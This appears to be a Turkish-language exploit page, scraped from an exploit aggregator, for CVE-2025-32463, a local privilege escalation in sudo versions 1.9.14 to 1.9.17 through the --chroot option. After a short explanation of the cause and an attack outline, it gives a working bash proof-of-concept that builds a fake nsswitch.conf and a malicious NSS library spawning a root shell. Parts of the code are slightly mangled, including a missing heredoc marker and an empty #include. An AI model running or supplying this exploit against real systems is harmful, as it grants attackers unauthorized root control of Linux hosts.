Share
## https://sploitus.com/exploit?id=4369C109-0575-5506-9251-C309214995D2
# 📌 CVE-2025-32463 — Sudo `--chroot` Local Privilege Escalation  
**ExploitDB ID:** 52352  

---

## 🧠 Genel Bakış

Bu repo, **Sudo 1.9.14 – 1.9.17** sürümlerini etkileyen kritik bir **yerel yetki yükseltme (LPE)** zafiyetini belgelemektedir.  

Zafiyet, `sudo -R (--chroot)` seçeneğinin hatalı uygulanmasından kaynaklanır ve **sudoers dosyasında izinli olmasa bile**, saldırganın **root yetkisiyle komut çalıştırmasına** olanak tanır.

> 🔥 **Sonuç:** Yetkisiz bir kullanıcı → **root shell**

---

## 🧩 Etkilenen Bileşen

- **Yazılım:** sudo  
- **Etkilenen Sürümler:**
  - 1.9.14
  - 1.9.15
  - 1.9.16
  - 1.9.17
- **CVE ID:** CVE-2025-32463  
- **Platform:** Linux (özellikle NSS kullanan sistemler)  
- **Test Edilen Sistem:** Kali Rolling 2025  

---

## ⚙️ Zafiyetin Teknik Nedeni

Sudo’nun `--chroot` (`-R`) parametresi, kullanıcıya **kendi belirlediği bir root dizini altında komut çalıştırma** yetkisi tanır.

Ancak **sudo 1.9.14** ile yapılan bir değişiklik sonucu:

- `sudoers` dosyası **henüz tam doğrulanmadan**
- `chroot()` çağrısı **kullanıcının belirttiği dizin üzerinden** yapılmaktadır

Bu durum, saldırganın kendi oluşturduğu sahte bir:

``` /etc/nsswitch.conf ```


dosyası aracılığıyla **kötü niyetli bir NSS kütüphanesini (`libnss_*.so`) root yetkisiyle yükletmesine** neden olur.

---

## 🧨 Saldırı Senaryosu (Özet)

1. Geçici bir dizin oluşturulur  
2. Sahte bir `nsswitch.conf` hazırlanır  
3. Kötü amaçlı bir NSS shared library derlenir  
4. `sudo -R  ` çağrısı yapılır  
5. NSS library **root yetkisiyle yüklenir**  
6. **Root shell elde edilir** 🚀  

---

## 🧪 Proof of Concept (PoC)

> ⚠️ **Yalnızca eğitim ve test ortamlarında kullanınız**

```bash
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463

set -e

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"

cat > woot1337.c 
#include 

__attribute__((constructor))
void woot(void) {
    setreuid(0,0);
    setregid(0,0);
    chdir("/");
    execl("/bin/bash","/bin/bash",NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc

gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

sudo -R woot woot